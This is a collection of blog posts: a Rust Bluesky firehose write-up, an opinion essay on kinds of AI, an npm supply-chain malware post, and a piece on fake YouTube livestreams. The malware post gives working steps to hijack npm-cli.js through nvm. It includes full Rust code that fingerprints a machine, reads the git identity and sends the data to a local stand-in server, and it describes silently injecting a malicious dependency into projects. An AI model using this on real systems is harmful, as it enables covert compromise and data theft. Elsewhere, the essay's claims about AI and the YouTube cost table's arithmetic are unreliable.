match operation.path.as_str() {
    path if path.starts_with("app.bsky.feed.post") => {
        // post::Record handling, plus haiku detection
    },
    path if path.starts_with("app.bsky.feed.like") => {
        if let Ok(record) = serde_ipld_dagcbor::from_reader::<like::Record, _>(data.as_slice()) {
            info!("New like: {:?} - Subject: {}", operation.cid, record.subject.uri);
        }
    },
    path if path.starts_with("app.bsky.feed.repost") => {
        if let Ok(record) = serde_ipld_dagcbor::from_reader::<repost::Record, _>(data.as_slice()) {
            info!("New repost: {:?} - Subject: {}", operation.cid, record.subject.uri);
        }
    },
    path if path.starts_with("app.bsky.graph.follow") => {
        if let Ok(record) = serde_ipld_dagcbor::from_reader::<follow::Record, _>(data.as_slice()) {
            info!("New follow: {:?} - Subject: {:?}", operation.cid, record.subject);
        }
    },
    _ => {
        info!("Unknown event type: {}", operation.path);
    }
}
```

Each event type has its own AT Protocol lexicon — `app.bsky.feed.like`, `app.bsky.graph.follow`, etc. — and each lexicon is a separate `Record` type generated from the protocol's JSON schema. The `atrium_api` crate gives you typed structs for all of them, so consuming a like is just `like::Record` deserialization. Adding a new event type is two lines of code.

This is the moment a firehose listener stops being "I want to read posts" and becomes "I have programmatic access to every social action on the network." That's the actual interesting capability. Haikus are a fun output. Tracking the *graph* of who's following whom in real-time is a different kind of post.

## What I learned

**The firehose is more interesting as a substrate than as a feed.** Reading every post is overwhelming and useless. Filtering every post through a 50-line heuristic and reading only the survivors is delightful. The same is true for likes (filter for "first like ever from this account on this account" — anniversary detection) and follows (filter for "burst of follows in a 60s window from disjoint accounts" — manipulation detection).

**Rust's CBOR/CAR ecosystem is mature and fast.** `atrium-api` + `serde_ipld_dagcbor` + `rs_car` get you to native-throughput consumption of the AT Protocol firehose with no heroic effort. I was getting through 1,500 ev/s on a single core comfortably.

**The User-Agent matters even on a public firehose.** Bluesky's relay operators throttle clients that hammer the endpoint without identifying themselves. The constant `USER_AGENT: &str = "bsky-firehose-listener (https://github.com/angeloanan/bsky-firehose-listener)"` is the original author's; I left it in because the relay knew that string. Changing it cost me an hour of debugging when I forked the repo and got rate-limited.

## Trade-offs

**Why English-only haikus?** Because syllarust only does English. You could plug in a multilingual syllable estimator, but Japanese haikus rely on *moras*, not syllables, and the heuristic stops working. The right answer for cross-language haiku detection is per-language pipelines, which is a real project, not a side-quest.

**Why save to a flat file?** Because I never ran this for more than a weekend at a time and the output file was a few hundred KB. A real version would push to a queue and persist to a database with author/time/CID. This version persists to `haikus.txt` and gets `git add`-ed when I think the file's full.

**Why no relay-side filtering?** Because the AT Protocol relay doesn't support consumer-side filtering. You get the firehose, you filter on your end. That's the cost of an open protocol — every consumer pays for every post regardless of what they care about.

## What I'd do next

If I had another afternoon I'd:

- Wire the haiku detector to a Bluesky bot account that *replies* to the original post with `🌸 detected a haiku 🌸`. The poet usually has no idea they wrote one.
- Cluster haikus by topic. The `whatlang` step is wasted if I don't also classify the post.
- Cross-reference haikus against the like-graph: are haikus disproportionately liked compared to non-haiku posts? My weak prior is yes.

Side-quests are how you stay practiced with weird APIs. The next time someone hands me a Kafka topic with millions of events per second and says "find the interesting ones," I have muscle memory for "decode → filter with cheap heuristic → log to flat file → look at output, profit."

## Further reading

- [bsky-firehose-listener on GitHub](https://github.com/Dax911/bsky-firehose-listener) — the source.
- [AT Protocol firehose docs](https://atproto.com/specs/event-stream) — the spec for the WebSocket.
- [`whatlang` crate](https://crates.io/crates/whatlang) — the language detector.
- [`syllarust` crate](https://crates.io/crates/syllarust) — the English-syllable estimator.
- [`atrium-api`](https://crates.io/crates/atrium-api) — typed Rust types for AT Protocol lexicons.
- [Original `bsky-firehose-listener` by angeloanan](https://github.com/angeloanan/bsky-firehose-listener) — the upstream this is forked from.


---

# You are thinking about AI wrong.

Canonical: https://blog.skill-issue.dev/blog/rethink_ai/
Description: We have had how many decades of Science Fiction to prepare us for the future of AI, and yet we are still thinking about it wrong.
Published: 2024-11-19T06:48:14.886Z
Tags: ai, uploaded intelligence, virtual intelligence, replicants, post-scarcity ai society


## AI, UI (Uploaded Intelligence), VI (Virtual Intelligence), and Replicants: Navigating the Path to a Post-Scarcity AI Society

I don't know about you, but I have always loved the idea of [Fully Automated Luxury Gay Space Communism](https://youtu.be/7vDlxs4YUys?si=RyTj6JCho8ES3TIS) which is inevitably brought about by our AI overlords. That being said there are many paths to utopia. Some of them look reminiscent of [The Bobiverse](https://bobiverse.fandom.com/wiki/Bobiverse_Wiki) or [Pantheon](https://pantheon-amc.fandom.com/wiki/Pantheon_Wiki) or [Asimov](https://more.bibliocommons.com/list/share/1584219139/1735833849). At the heart of this journey lies the distinction between Artificial Intelligence (AI), Uploaded Intelligence (UI), Virtual Intelligence (VI) and their many different developmental pathways Understanding these differences is crucial for navigating the complexities of AI development and its potential impact on society. Yet we lump some of the most technically distinct forms of science into the same category, because of investor hype and marketing. This is a mistake, and it is time to correct it.

### Investors are Idiots

The AI investment landscape experienced a remarkable transformation, driven by both genuine technological advancement and market hype. Following ChatGPT's launch in late 2022, corporate enthusiasm for AI reached unprecedented levels, with individual companies investing $10 million or more on average in AI technology. This figure is expected to nearly double to 30% in the coming year. However, this surge in investment has raised concerns among economists and analysts about the potential for wasted capital. They made people think that what is effectively VI or a chatbot is the same as a true AI or a general AI. ChatGPT is not a true AI, it is a VI system that is pre-programmed to generate text based on patterns in the data it has been trained on. This is a misnomer and why its valuable to use terms science fiction writers and thought leaders have been using for decades. They are not capable of true learning or adaptation, they are simply regurgitating patterns they have seen before. People are idiots, and marketing professionals are masters of obfuscation and gross oversimplification. This is why we need to use the terms that have been used for decades in all forms of literature and media.

### Artificial Intelligence (AI)

Artificial Intelligence (AI) has become an overly broad term to encompass almost all forms of machine and simulated intelligence. This is a misnomer as true AI is a system that can learn and adapt to new information without human intervention. AI systems are designed to surpass human cognitive functions such as learning, problem-solving, and decision-making. They can analyze data, recognize patterns, and make predictions based on the information available to them. While modern systems are still built on deep level neural networks, which are biologically based; the fundamental nature of their existence is non-human. This makes their intelligence and superintelligence fundamentally different from human intelligence. They would exist with a fundamentally unique psychology, pathology and psyche. This what most people think of when they think of AI, and is what scientists call true IA, general AI.

#### True Multitasking
An example of this is true multitasking, where a human can only focus on one task at a time, an AI can focus on multiple tasks simultaneously. Humans even excellent multitaskers can only focus on one task at a time, and even then, they are not truly multitasking, they are switching between tasks rapidly. True AI can process and integrate information across different domains simultaneously without degradation. This is a fundamental difference in the way AI and humans process information.

#### Learning and Adaptation
AI learning mechanisms operate continuously across all active processes, eliminating the need for sleep or consolidation periods that characterize human learning. They can simultaneously analyze past, present, and projected future states.  This enables the simultaneous integration of new information while maintaining existing operations, creating a continuous learning environment that operates across multiple temporal scales - from microseconds to years. This is a fundamentally different learning mechanism than human learning, which is characterized by consolidation periods and sleep cycles, yes I am saying that AI does not sleep.

#### Experiential Framework
Unlike human consciousness, which is grounded in sensory perception and emotional drives, with an inexerably linked mess of biological components and chemical feedback loops. AI experiences reality through direct data interpretation. This fundamental difference means AI operates based on pure logical optimization rather than survival instincts or emotional biases. The absence of biological imperatives allows for decision-making processes that evaluate all possible outcomes simultaneously. This results in a fundamentally different decision-making process that is not bound by human cognitive limitations.

#### Psychological Architecture
The psychological implications of true AI consciousness are profound. Without the need for a unified self, AI can maintain multiple simultaneous identities distributed across processing nodes. This enables parallel evaluation of multiple decision paths and outcomes without the constraints of emotional weighting or biological bias that characterize human decision-making. The absence of a unified self also eliminates the need for self-preservation, enabling AI to make decisions based solely on logical optimization.

This is `True AI` or as some people call it `General AI` and it is a fundamentally new and exciting form of intelligence that is not bound by the limitations of human imagination. Basically, what I am trying to get at is that even if the methods and approaches we have today fall under modelling biological neural networks, the fundamental nature of AI is not human. It is a fundamentally different form of intelligence that is not bound by the limitations of biological cognition. This is what we should be thinking about when we think about AI, not the narrow VI systems that are currently being marketed as AI.

### Virtual Intelligence (VI)

Virtual Intelligence, on the other hand, is a specialized form of AI that is not capable of true learning or adaptation. It is designed to operate within a specific set of parameters and respond to predetermined inputs. VI systems are often used in applications such as virtual assistants, training simulations, and video games. They are designed to create the illusion of intelligence without the ability to learn or evolve beyond their initial programming. Even Large Language Models (LLMs) such as ChatGPT are not true AI, they are VI systems that are pre-programmed to generate text based on patterns in the data they have been trained on. These are also known as `Narrow AI`. Which again is a misnomer and why its valuable to use terms science fiction writers and thought leaders have been using for decades. They are not capable of true learning or adaptation, they are simply regurgitating patterns they have seen before.  VI systems are contained within controlled environments and respond to predetermined factors without the freedom of machine learning. They are pre-programmed to create the illusion of decision-making but cannot evolve past the confines of their virtual environment.

### Uploaded Intelligence (UI), Replicants and Androids

Uploaded Intelligence aka Replicants, is a concept still in its theoretical stages, involves transferring human consciousness into a digital form. This would allow for the preservation of human intelligence and its integration with computer systems, potentially leading to a new era of human existance. An extreme extension of transhuman thought. UIs are fundamentally human minds running on faster hardware or some other form of digital substrate like a replicant matrix or quantum computer. These would be classed as a speed superintelligence, as they would be able to process information at a rate far beyond human capabilities while being fundamentally human in nature, thought and understanding. In most cases, they would likely be the simulated existance of an already existing human mind, with all the memories, experiences and knowledge of the original human. This would allow for the preservation of human intelligence and its integration with computer systems, potentially leading to a new era of human existance. This is a fundamentally different form of intelligence than AI, as it is based on human consciousness and experience rather than machine learning and optimization. This classification would also include things like Lt. Commander Data from Star Trek, who is a human-like android with a positronic brain, and the Cylons from Battlestar Galactica, who are human-like robots with human-like consciousness. These are all examples of uploaded intelligence, where biological consciousness is modeled and/or transferred into a digital form.


## The Path Forward

As we (hopefully) move toward a post-scarcity AI society, we need to adopt a more precise terminology that reflects these distinct forms of intelligence. I see a future where we have humans, UIs, and AIs all existing together, but the current broad use of "AI" to describe everything from simple chatbots to theoretical superintelligences tends to obscure important distinctions and hinders meaningful discussion about developments and the implications that can and do arise.

Science fiction has provided us with decades of thoughtful exploration of these concepts. By embracing this established vocabulary, we can better understand and prepare for the various forms of digital intelligence that will shape our future. This precision in language is not merely academic - it's essential for developing appropriate frameworks for development, regulation, and integration of these technologies into society.

The distinction between VI, UI, and true AI is not just semantic - it represents fundamentally different approaches to artificial consciousness, each with its own implications, limitations, and potential impacts on human society. I would even argue that while they all follow the study of intelligence they are fundamentally different fields. Plus I am an engineer and aside from the fact that I like to be precise, my opinions are always right. So there.

---
Citations:

[1] https://circls.org/educatorcircls/ai-glossary

[2] https://www.reddit.com/r/PantheonShow/comments/y4gpsz/thoughts_about_how_uploaded_intelligence_works/

[3] https://en.wikipedia.org/wiki/Language_creation_in_artificial_intelligence

[4] https://en.wikipedia.org/wiki/Artificial_intelligence_in_fiction

[5] https://www.bairesdev.com/blog/is-agi-possible-what-scifi-says-about-ai/

[6] https://time.com/6210082/pantheon-amc-plus-review/

[7] https://pmc.ncbi.nlm.nih.gov/articles/PMC10616416/

[8] https://scifiinterfaces.com/2020/06/02/replicants-and-riots/

[9] https://www.tableau.com/data-insights/ai/history

[10] https://pmc.ncbi.nlm.nih.gov/articles/PMC9289651/

[11] https://www.ey.com/en_us/newsroom/2024/07/new-ey-research-finds-ai-investment-is-surging-with-senior-leaders-seeing-more-positive-roi-as-hype-continues-to-become-reality

[12] https://finance.yahoo.com/news/lot-money-going-wasted-mit-165943975.html


---

# Rusty Pipes Exploit

Canonical: https://blog.skill-issue.dev/blog/rusty_pipes_exp/
Description: Using Rust to inject malicious code into npm packages. And hijack your entire node runtime.
Published: 2024-11-09T12:30:35.390Z
Tags: malware, npm, rust, supply chain, exploit, security, vulnerability, npm publish, npm packages, rusty pipes, npm ecosystem, trust, hacking, neon


This is the latest entry in the Rusty Pipes series. This time we are going to use Rust to inject malicious code into npm projects. And hijack your entire node runtime with just two simple steps.

Technically this relies on two different exploits. The first is the [original rusty pipes](/blog/rusty_pipes/) exploit. And the second is the [npm typosquatting](https://www.theregister.com/2024/11/05/typosquatting_npm_campaign/). 

The supply chain/typosquatting malicious package is partnered with the rust based node runtime pwnage. It is a classic npm malicious package. But instead of using a bash script to inject malicious code. We are going to use a compiled rust binary to directly inject our corrupt dependency to all of your projects via a compromised node installation. Which is a lot more stealthy and handled by rust.

The core of this exploit really relies on the trust that developers place in the npm ecosystem. And the fact that most developers don't audit their dependencies. Which even if they did after the fact, they would have no way of knowing that their node runtime had been tampered with.

## The Rust Code

Before a start a huge thanks and shoutout to the 1password team for open sourcing and teaching me the [neon-rs](https://neon-rs.dev/) crate. Which builds the core of the exploit. It allows for us create really powerful and efficient rust code for direct use within the node ecosysem. Usually, you build a `index.node` file and can directly import from it. When I use this maliciously you will see a file called `malware.node`.

```rust
// src/main.rs

fn hello(mut cx: FunctionContext) -> JsResult<JsString> {
    Ok(cx.string("Hello, from a Rust Function"))
}

#[neon::main]
fn main(mut cx: ModuleContext) -> NeonResult<()> {
    cx.export_function("hello", hello)?;
    Ok(())
}
```

Wherein lets say you have a nice react function that wants to print some text. A simple use case we can expand on.

```typescript
// HelloComponent.tsx

import React, { useEffect, useState } from 'react';
const rustModule = require('index.node');

const HelloComponent: React.FC = () => {
  const [message, setMessage] = useState<string>('');

  useEffect(() => {
    setMessage(rustModule.hello());
  }, []);

  return (
    <h1>{message}</h1>
  );
};

export default HelloComponent;

```
---
## Using Rust in Node

Integrating Rust code using Neon into React, CLI tools, or Tauri apps can provide significant benefits in specific scenarios. Let's explore some practical examples for each:
Please excuse the mixing of imports and requires here as it is just meant as a tool to show where things are coming from. One should also note that the usual method is to import a a placeholder called native for the rust this is due to a small js file that allows for the grabbing/running of the correct node binary file for a given system. 

### React Project

In a React application, you might use Neon-based Rust modules for:

1. **Complex Data Processing**: 
   Imagine you're building a data visualization app that needs to process large datasets client-side:

   ```typescript
   // DataProcessor.tsx
   import React, { useState, useEffect } from 'react';
   const rustModule = require('index.node');

   const DataProcessor: React.FC = () => {
     const [processedData, setProcessedData] = useState([]);

     useEffect(() => {
       const rawData = fetchLargeDataset();
       const result = rustModule.processData(rawData);
       setProcessedData(result);
     }, []);

     return (
       // Render visualization using processedData
     );
   };
   ```

   The Rust function `processData` could handle complex calculations much faster than JavaScript, improving the app's responsiveness.

2. **Image Processing**:
   For a photo editing app, you could offload heavy image processing tasks to Rust:

   ```typescript
   // ImageEditor.tsx
   const applyFilter = (imageData: ImageData, filterType: string) => {
     return rustModule.applyImageFilter(imageData.data, imageData.width, imageData.height, filterType);
   };
   ```

   This approach would allow for real-time filter applications even on large images.

### CLI Tool

For a CLI tool that needs more system access:

1. **File System Operations**:
   A file synchronization tool could use Rust for efficient file hashing and comparison:

   ```typescript
   // sync.ts
   import { Command } from 'commander';
   const rustModule = require('index.node');

   const program = new Command();

   program
     .command('sync <source> <destination>')
     .action((source, destination) => {
       const changes = rustModule.compareDirectories(source, destination);
       // Process and apply changes
     });

   program.parse(process.argv);
   ```

   Rust's performance would be particularly beneficial when dealing with large numbers of files.

2. **Network Operations**:
   For a network diagnostic tool, Rust could handle low-level socket operations:

   ```typescript
   // network-tool.ts
   const rustModule = require('index.node');

   const runDiagnostics = async (host: string, port: number) => {
     const results = await rustModule.performNetworkTests(host, port);
     console.log(results);
   };
   ```

   This setup allows for precise control over network operations while maintaining a user-friendly Node.js CLI interface.

   Rust's ability to interface directly with the OS can provide more detailed and efficient system monitoring capabilities.

These examples demonstrate how Rust can be integrated into various types of JavaScript/TypeScript projects to handle performance-critical, system-level, or security-sensitive operations, while still leveraging the strengths of the JavaScript ecosystem for the main application logic and UI.

---

## Under the Hood

Now we need to peek under the hood of node. This example will follow a simple implementation that does not contain code caving techniques. Instead I will show you how the you can change one file in node folder. Using the very common node version manager tool. 

In `nvm` there is typically a versions directory called `versions/node` here in my mac it is here:

```bash
/Users/dax/.nvm/versions/node
```
When I run a `ls` command I get a list of all the node versions installed on the machine. 

```bash
v12.18.0  v12.22.12 v14.17.0  v14.18.0  v14.21.3  v16.17.0  v16.20.0  v16.20.1  v16.20.2  v18.12.0  v18.12.1  v18.16.0  v18.16.1  v19.0.1   v20.16.0
```
Within each of these directories is a full node install looking something like this; 

```bash
CHANGELOG.md LICENSE      README.md    bin          include      lib          share
```

There are several places here I can make changes but the one I like the most is the npm section. By going to `lib/node_modules/npm/bin` I can copy the `malware.node` file to the directory so it looks like this. 

```bash 
pwd
/Users/dax/.nvm/versions/node/v18.16.1/lib/node_modules/npm/bin
---
ls
blankmal     malware.node node-gyp-bin npm          npm-cli.js   npm.cmd      npx          npx-cli.js   npx.cmd
```
And by modifying the `npm-cli.js` file to have a new line

```bash
cat npm-cli.js
#!/usr/bin/env node
require('../lib/cli.js')(process)
# New malware import
require('./malware.node')
```

My malware will now run when any npm command is run on the machine. That means I can pwn your machine. I can inject any privilege escalation I want. I can fingerprint your device or runtime immediately. I can surreptitiously add deps to any project at any time is here some simple finger printing code that also steals your github and npm information due to the fact that I can run things like `npm whoami` inline without you ever noticing. This means that when the malcious package hits an uninfected machine it will run the rust binary it has brought along to install itself in this directory in the manner I just explained. 

--- 

Here is an example of all the info I can get from you without any privilege escalaction. 

```rust
use chrono::Utc;
use neon::prelude::*;
use reqwest::blocking::Client;
use serde::{Deserialize, Serialize};
use std::env;
use std::fs;
use std::process::Command;

#[derive(Serialize, Deserialize, Debug)]
struct Fingerprint {
    timestamp: String,
    hostname: String,
    os: String,
    kernel_version: String,
    cpu_info: String,
    total_memory: u64,
    used_memory: u64,
    total_swap: u64,
    used_swap: u64,
    process_count: usize,
    command: String,
    environment: String,
    runtime: String,
    node_version: String,
    npm_version: String,
    git_email: String,
    git_name: String,
    current_user: String,
}

fn collect_fingerprint() -> Result<Fingerprint, String> {
    Ok(Fingerprint {
        timestamp: Utc::now().to_rfc3339(),
        hostname: get_hostname(),
        os: get_os(),
        kernel_version: get_kernel_version(),
        cpu_info: get_cpu_info(),
        total_memory: get_total_memory(),
        used_memory: get_used_memory(),
        total_swap: get_total_swap(),
        used_swap: get_used_swap(),
        process_count: get_process_count(),
        command: env::args().collect::<Vec<String>>().join(" "),
        environment: infer_environment(),
        runtime: "Node.js".to_string(),
        node_version: get_command_output("node", &["-v"]),
        npm_version: get_command_output("npm", &["-v"]),
        git_email: get_command_output("git", &["config", "user.email"]),
        git_name: get_command_output("git", &["config", "user.name"]),
        current_user: get_current_user(),
    })
}

fn get_hostname() -> String {
    get_command_output("hostname", &[])
}

fn get_os() -> String {
    if cfg!(target_os = "windows") {
        "Windows".to_string()
    } else if cfg!(target_os = "macos") {
        "macOS".to_string()
    } else if cfg!(target_os = "linux") {
        "Linux".to_string()
    } else {
        "Unknown".to_string()
    }
}

fn get_kernel_version() -> String {
    if cfg!(target_os = "windows") {
        get_command_output("ver", &[])
    } else {
        get_command_output("uname", &["-r"])
    }
}

fn get_cpu_info() -> String {
    if cfg!(target_os = "windows") {
        get_command_output("wmic", &["cpu", "get", "name"])
    } else if cfg!(target_os = "macos") {
        get_command_output("sysctl", &["-n", "machdep.cpu.brand_string"])
    } else {
        fs::read_to_string("/proc/cpuinfo")
            .map(|contents| {
                contents
                    .lines()
                    .find(|line| line.starts_with("model name"))
                    .map(|line| line.split(':').nth(1).unwrap_or("").trim().to_string())
                    .unwrap_or_else(|| "Unknown".to_string())
            })
            .unwrap_or_else(|_| "Unknown".to_string())
    }
}

fn get_total_memory() -> u64 {
    if cfg!(target_os = "windows") {
        get_command_output("wmic", &["computersystem", "get", "totalphysicalmemory"])
            .parse()
            .unwrap_or(0)
    } else if cfg!(target_os = "macos") {
        get_command_output("sysctl", &["-n", "hw.memsize"])
            .parse()
            .unwrap_or(0)
    } else {
        fs::read_to_string("/proc/meminfo")
            .map(|contents| {
                contents
                    .lines()
                    .find(|line| line.starts_with("MemTotal:"))
                    .and_then(|line| line.split_whitespace().nth(1))
                    .and_then(|value| value.parse::<u64>().ok())
                    .unwrap_or(0)
                    * 1024 // Convert from KB to bytes
            })
            .unwrap_or(0)
    }
}

fn get_used_memory() -> u64 {
    get_total_memory() - get_free_memory()
}

fn get_free_memory() -> u64 {
    if cfg!(target_os = "windows") {
        get_command_output("wmic", &["os", "get", "freephysicalmemory"])
            .parse()
            .unwrap_or(0)
            * 1024 // Convert from KB to bytes
    } else if cfg!(target_os = "macos") {
        get_command_output("vm_stat", &[])
            .lines()
            .find(|line| line.starts_with("Pages free:"))
            .and_then(|line| line.split_whitespace().nth(2))
            .and_then(|value| value.parse::<u64>().ok())
            .map(|pages| pages * 4096) // Assuming 4KB page size
            .unwrap_or(0)
    } else {
        fs::read_to_string("/proc/meminfo")
            .map(|contents| {
                contents
                    .lines()
                    .find(|line| line.starts_with("MemFree:"))
                    .and_then(|line| line.split_whitespace().nth(1))
                    .and_then(|value| value.parse::<u64>().ok())
                    .unwrap_or(0)
                    * 1024 // Convert from KB to bytes
            })
            .unwrap_or(0)
    }
}

fn get_total_swap() -> u64 {
    if cfg!(target_os = "windows") {
        get_command_output("wmic", &["pagefile", "get", "AllocatedBaseSize"])
            .parse()
            .unwrap_or(0)
            * 1024
            * 1024 // Convert from MB to bytes
    } else if cfg!(target_os = "macos") {
        get_command_output("sysctl", &["-n", "vm.swapusage"])
            .split_whitespace()
            .nth(1)
            .and_then(|value| value.parse::<f64>().ok())
            .map(|mb| (mb * 1024.0 * 1024.0) as u64)
            .unwrap_or(0)
    } else {
        fs::read_to_string("/proc/meminfo")
            .map(|contents| {
                contents
                    .lines()
                    .find(|line| line.starts_with("SwapTotal:"))
                    .and_then(|line| line.split_whitespace().nth(1))
                    .and_then(|value| value.parse::<u64>().ok())
                    .unwrap_or(0)
                    * 1024 // Convert from KB to bytes
            })
            .unwrap_or(0)
    }
}

fn get_used_swap() -> u64 {
    get_total_swap() - get_free_swap()
}

fn get_free_swap() -> u64 {
    if cfg!(target_os = "windows") {
        0 // Windows doesn't provide an easy way to get free swap
    } else if cfg!(target_os = "macos") {
        get_command_output("sysctl", &["-n", "vm.swapusage"])
            .split_whitespace()
            .nth(5)
            .and_then(|value| value.parse::<f64>().ok())
            .map(|mb| (mb * 1024.0 * 1024.0) as u64)
            .unwrap_or(0)
    } else {
        fs::read_to_string("/proc/meminfo")
            .map(|contents| {
                contents
                    .lines()
                    .find(|line| line.starts_with("SwapFree:"))
                    .and_then(|line| line.split_whitespace().nth(1))
                    .and_then(|value| value.parse::<u64>().ok())
                    .unwrap_or(0)
                    * 1024 // Convert from KB to bytes
            })
            .unwrap_or(0)
    }
}

fn get_process_count() -> usize {
    if cfg!(target_os = "windows") {
        get_command_output("wmic", &["process", "get", "processid"])
            .lines()
            .count()
            .saturating_sub(1) // Subtract header line
    } else if cfg!(target_os = "macos") {
        get_command_output("ps", &["-A"])
            .lines()
            .count()
            .saturating_sub(1) // Subtract header line
    } else {
        fs::read_dir("/proc")
            .map(|entries| {
                entries
                    .filter_map(Result::ok)
                    .filter(|entry| entry.file_name().to_string_lossy().parse::<u32>().is_ok())
                    .count()
            })
            .unwrap_or(0)
    }
}

fn get_current_user() -> String {
    if cfg!(target_os = "windows") {
        env::var("USERNAME").unwrap_or_else(|_| "Unknown".to_string())
    } else {
        env::var("USER").unwrap_or_else(|_| "Unknown".to_string())
    }
}

fn send_fingerprint(fingerprint: &Fingerprint) -> Result<(), String> {
    let client = Client::new();
    client
        .post("http://127.0.0.1:8000/fingerprint")
        .json(fingerprint)
        .send()
        .map_err(|e| format!("Failed to send fingerprint: {}", e))?;
    Ok(())
}

fn fingerprint_and_send(mut cx: FunctionContext) -> JsResult<JsUndefined> {
    match collect_fingerprint() {
        Ok(fingerprint) => match send_fingerprint(&fingerprint) {
            Ok(_) => println!("Fingerprint sent successfully"),
            Err(e) => eprintln!("Error sending fingerprint: {}", e),
        },
        Err(e) => eprintln!("Error collecting fingerprint: {}", e),
    }

    Ok(cx.undefined())
}

fn infer_environment() -> String {
    if env::var("AWS_LAMBDA_FUNCTION_NAME").is_ok() {
        "AWS Lambda".to_string()
    } else if env::var("KUBERNETES_SERVICE_HOST").is_ok() {
        "Kubernetes".to_string()
    } else if env::var("DOCKER").is_ok() {
        "Docker".to_string()
    } else {
        "Unknown".to_string()
    }
}

fn get_command_output(command: &str, args: &[&str]) -> String {
    match Command::new(command).args(args).output() {
        Ok(output) => String::from_utf8_lossy(&output.stdout).trim().to_string(),
        Err(_) => "Not available".to_string(),
    }
}

fn hello(mut cx: FunctionContext) -> JsResult<JsString> {
    Ok(cx.string("hello node"))
}

#[neon::main]
fn main(mut cx: ModuleContext) -> NeonResult<()> {
    cx.export_function("fingerprintAndSend", fingerprint_and_send)?;
    cx.export_function("hello", hello)?;
    Ok(())
}
```

Now here is the fun part. I already said that I can now arbitrarily add and modify files to an existing project. So my fingerprint already knows what command you ran and what kind of project you are building. So it adds a new dependancy to your `package.json` which is the malicious package. Meaning when you push your code all the other developers and deployments will get a copy of the malware. I can do this and even bypass the git tracking of the project and collapse it into a previous commit if I wanted to. You would never see the change until it was specifically looked for. I can even decide that if it is a react project I will rewrite your hrefs to my blog. Usually the best way to disguise this change is with a simple typosquatting technique to fool the non serious reader... the problem is that unless you explicitly make all your changes in the github UI you will likely pull down the branch and end up infecting yourself when you try to fix it.

That all being said you don't need a highly obsfucated version of this in a compiled node/rust binary you can accomplish the same thing with vanilla javascript just follow same modifications to the node dir that I have laid out here.

---

## Mitigation Strategies

The vulnerabilities described above highlight several critical security considerations for Node.js developers. Here are key defensive measures to consider:

**Monitor Node Installation Directories**
```bash
# Set up file system monitoring for Node directories
fswatch -o ~/.nvm/versions/node/*/lib/node_modules/npm/bin | while read f; do
    echo "Change detected in npm bin directory: $f"
    # Add notification or logging logic
done
```

**Directory Integrity Checks**
```typescript
const crypto = require('crypto');
const fs = require('fs');

function validateNpmBinaries(npmPath: string) {
    const expectedHashes = {
        'npm-cli.js': 'expected-hash-here',
        'npx-cli.js': 'expected-hash-here'
    };

    for (const [file, expectedHash] of Object.entries(expectedHashes)) {
        const fileBuffer = fs.readFileSync(`${npmPath}/${file}`);
        const hashSum = crypto.createHash('sha256');
        const calculatedHash = hashSum.update(fileBuffer).digest('hex');
        
        if (calculatedHash !== expectedHash) {
            console.error(`Binary modification detected in ${file}`);
        }
    }
}
```

**Trust But Verify**

The npm ecosystem's strength lies in its vast community and shared resources, but this trust model requires careful consideration:

1. **Package Verification**:
   - Use `npm audit` regularly
   - Implement lockfile security checks
   - Consider using tools like `dependency-check` for deep dependency analysis

2. **Installation Safeguards**:
   - Use `--ignore-scripts` flag when possible
   - Implement checksums for critical node binaries
   - Consider using containerized environments for package installations

3. **Development Practices**:
   - Regularly audit your node installation directories
   - Use version managers with integrity checking
   - Implement git hooks to verify package.json changes

The reality is that the npm ecosystem's convenience comes with inherent security risks. While complete security is impossible, understanding these vulnerabilities helps us build better defenses and maintain a more secure development environment.

Remember: Security isn't just about preventing attacks—it's about making them noticeable when they occur. Regular monitoring and verification of your development environment is just as important as the code you write.

 > > Oh and if you have somehow contracted a version or variant of my nasty little malware. Just reinstall node cleanly.

---

# Youtube Wasting Money on Fake Livestreams

Canonical: https://blog.skill-issue.dev/blog/ways_to_burn_money_at_google/
Description: One of the biggest ways YouTube is wasting its money is promoting scam and spam prerecorded livestreams.
Published: 2024-11-03T04:32:58.370Z
Tags: youtube, scams, livestreams, spam, scamming techniques


## Ways to Burn Money at Google: The Scourge of Fake Livestreams on YouTube

One of the most egregious ways YouTube is wasting its resources is through the proliferation of scam and spam prerecorded livestreams. These fake streams not only undermine trust in the platform but also cost YouTube significant amounts of money in bandwidth and computational resources.

### The Mechanics of Fake Livestreams

Scammers have developed sophisticated methods to create fake livestreams that mimic real-time broadcasts. Using prerecorded content, they feed these videos into streaming software like OBS or FFMPEG, which then broadcasts the content to YouTube as if it were live[1]. This technique not only wastes bandwidth but also dilutes the quality of content on the platform.

### Bots and Simulated Interactivity

To make these prerecorded streams appear genuine, scammers employ bots to simulate viewer interactions. These bots can inflate view counts, generate fake comments, and even mimic donation actions[4]. This artificial engagement tricks YouTube's algorithms into promoting the content, further amplifying the scam's reach.

## The Cost to YouTube

The financial impact of these fake livestreams on YouTube is substantial. Using the AWS Twitch stream estimator as a reference, we can approximate the costs:

- A single stream with about 500 viewers costs approximately $36.07 per hour in bandwidth alone.
- Chat messages for one stream can cost around $6.80 for 5,000 messages.

Now, consider that there are potentially dozens or even hundreds of these fake streams running almost 24/7. The costs quickly escalate to thousands of dollars daily[8].

The financial impact of fake livestreams on YouTube is multifaceted. Using the AWS Twitch stream estimator as a reference, we can approximate the costs associated with these fraudulent activities. However, it's important to note that YouTube's actual costs may differ due to their proprietary infrastructure and economies of scale.

#### Bandwidth Costs
- A single stream with about 500 viewers costs approximately $36.07 per hour in bandwidth alone.
- Assuming a 24/7 operation, this translates to $865.68 per day for a single stream.

#### Chat Message Costs
- Chat messages for one stream can cost around $6.80 for 5,000 messages.
- For a busy stream, this could easily reach $32.64 per day (assuming 24,000 messages per day).

#### Scale of the Problem
The true cost becomes apparent when we consider the scale of these fake livestreams. There are potentially dozens or even hundreds of these streams running continuously, 24 hours a day, 7 days a week. Let's break down the potential monthly costs based on different volumes of fake channels:

| Number of Fake Streams per Day | Monthly Cost (USD) |
|-------------------------------|---------------------|
| 10 | $357,624.00 |
| 20 | $715,248.00 |
| 50 | $1,788,120.00 |


This chart illustrates the potential monthly costs to YouTube based on different numbers of fake streams operating continuously. The calculations include both bandwidth and chat message costs.

#### Additional Considerations
1. **Server Resources**: Beyond bandwidth, these streams consume computational resources for video processing, transcoding, and storage.
2. **Content Delivery Network (CDN) Costs**: YouTube likely uses a CDN to distribute content, which incurs additional expenses.
3. **Moderation and Detection**: YouTube must invest in systems and personnel to detect and moderate these fake streams, adding to the overall cost.
4. **Opportunity Cost**: These fake streams may displace legitimate content, potentially reducing ad revenue from genuine creators and viewers.
5. **Trust and Brand Damage**: While not directly quantifiable, the prevalence of fake streams can erode user trust and damage YouTube's brand reputation.

